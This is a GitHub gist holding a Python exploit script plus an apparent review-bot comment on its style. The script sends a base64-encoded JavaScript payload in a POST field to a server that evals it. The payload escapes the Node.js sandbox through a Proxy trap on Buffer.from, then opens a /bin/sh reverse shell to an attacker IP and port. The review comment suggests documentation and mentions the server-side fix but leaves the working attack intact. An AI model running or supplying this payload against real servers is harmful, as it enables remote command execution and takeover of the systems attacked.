Created
July 15, 2021 15:45
richardcurteis created this gist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,55 @@ #!/usr/bin/python3 import requests import base64 target = f"http://127.0.0.1:3000/" cmd = "/bin/sh" attackerIp = "127.0.0.1" attackerPort = 4444 # Double {{}} pairs are required to escape single {} in Python formatted strings payload = """( function(){{ try{{ Buffer.from(new Proxy({{}}, {{ getOwnPropertyDescriptor(){{ throw f=>f.constructor("return process")(); }} }})); }}catch(e){{ let req = e(()=>{{}}).mainModule.require; let net = req("net"); let sh = req("child_process").exec("{0}"); let client = new net.Socket(); client.connect({1}, '{2}', function() {{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }}); }} }})();""".format(cmd, attackerPort, attackerIp) # Encode payload to base64 bytes-like object payload = base64.b64encode(payload.encode('ascii')) # Decode to plaintext payload = payload.decode("ascii") # eval() based wrapper for code housing payload wrapper = """( function(){{ let b64Payload = `{0}`; let buffer = new Buffer.from(b64Payload, 'base64'); let shell = buffer.toString(); eval(shell); }})();""".format(payload) # Proxy through burp for debugging proxies={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} # Define POST params and send request data = {"transformation": wrapper} res = requests.post(target, data=data, proxies=proxies) if res.status_code == 200: print("[X] Great success. Can haz shellz?")
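Review bot: The file has no module docstring, so a reader has to reverse-engineer the nested JavaScript in `payload` to learn what the script demonstrates; add a header along the lines of `"""PoC for a server that passes the POSTed `transformation` field to eval(): sends a base64-wrapped script whose Proxy trap, thrown from Buffer.from, yields a function that reaches process.mainModule.require; the fix on the server side is to never eval() request input."""`. The comments that are present describe mechanics (`# Encode payload to base64 bytes-like object`) rather than intent, and `wrapper` deserves a line saying why the payload is base64-encoded before being `eval`-ed rather than sent verbatim, which I can only infer from the code. As a point of style inside `wrapper`, `new Buffer.from(b64Payload, 'base64')` applies `new` to a factory function; `Buffer.from(b64Payload, 'base64')` is the documented form and reads correctly. The whole file arrives as one collapsed hunk, so individual lines cannot be referenced.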